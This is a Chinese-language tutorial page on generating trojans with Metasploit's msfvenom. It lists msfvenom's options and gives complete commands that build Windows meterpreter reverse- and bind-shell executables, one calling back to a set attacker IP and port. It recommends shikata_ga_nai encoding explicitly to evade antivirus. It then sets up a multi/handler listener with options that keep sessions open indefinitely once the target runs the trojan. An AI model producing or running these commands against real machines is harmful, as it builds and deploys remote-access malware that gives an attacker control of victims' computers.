Metasploit -- 生成木马(msfvenom)


作用:生成木马文件

1、msfvenom

相关参数介绍

-p, --payload <payload> 指定需要使用的payload(攻击荷载)

-l, --list [module_type] 列出指定模块的所有可用资源,模块类型包括: payloads, encoders, nops, all

-n, --nopsled <length> 为payload预先指定一个NOP滑动长度

-f, --format <format> 指定输出格式 (使用 --list formats 来获取msf支持的输出格式列表)

-e, --encoder [encoder] 指定需要使用的encoder(编码器)

-a, --arch <architecture> 指定payload的目标架构

--platform <platform> 指定payload的目标平台

-s, --space <length> 设定有效攻击荷载的最大长度

-b, --bad-chars <list> 设定规避字符集,比如: &#039;\x00\xff&#039;

-i, --iterations <count> 指定payload的编码次数

-c, --add-code <path> 指定一个附加的win32 shellcode文件

-x, --template <path> 指定一个自定义的可执行文件作为模板

-k, --keep 保护模板程序的动作,注入的payload作为一个新的进程运行

--payload-options 列举payload的标准选项

-o, --out <path> 保存payload

-v, --var-name <name> 指定一个自定义的变量,以确定输出格式

--shellest 最小化生成payload

-h, --help 查看帮助选项

--help-formats 查看msf支持的输出格式列表


2、以windows为例

基础命令格式

windows:msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.139.129 LPORT=8787 -f exe > shell.exe

加上编码(达到免杀效果)

msfvenom -p windows/meterpreter/bind_tcp -e x86/shikata_ga_nai -i 3 LHOST=192.168.139.131 LPORT=4444 -f exe > 1.exe


3、连接生成的木马

选择攻击模块(exploit/multi/handler)

设置payload和上面的一样

4、目标主机运行木马


注意:

msf exploit(multi/handler) > set ExitOnSession false   

//可以在接收到seesion后继续监听端口,保持侦听。

防止session意外退出

msf5 exploit(multi/handler) > set SessionCommunicationTimeout 0  

//默认情况下,如果一个会话将在5分钟(300秒)没有任何活动,那么它会被杀死,为防止此情况可将此项修改为0

msf5 exploit(multi/handler) > set SessionExpirationTimeout 0

//默认情况下,一个星期(604800秒)后,会话将被强制关闭,修改为0可永久不会被关闭


同一个IP使用不同网络掩码,会发生什么?

Metasploit -- 后渗透模块(POST)

获取更多资讯请加入交流群


    协助本站SEO优化一下,谢谢!
    关键词不能为空
评 论
更换验证码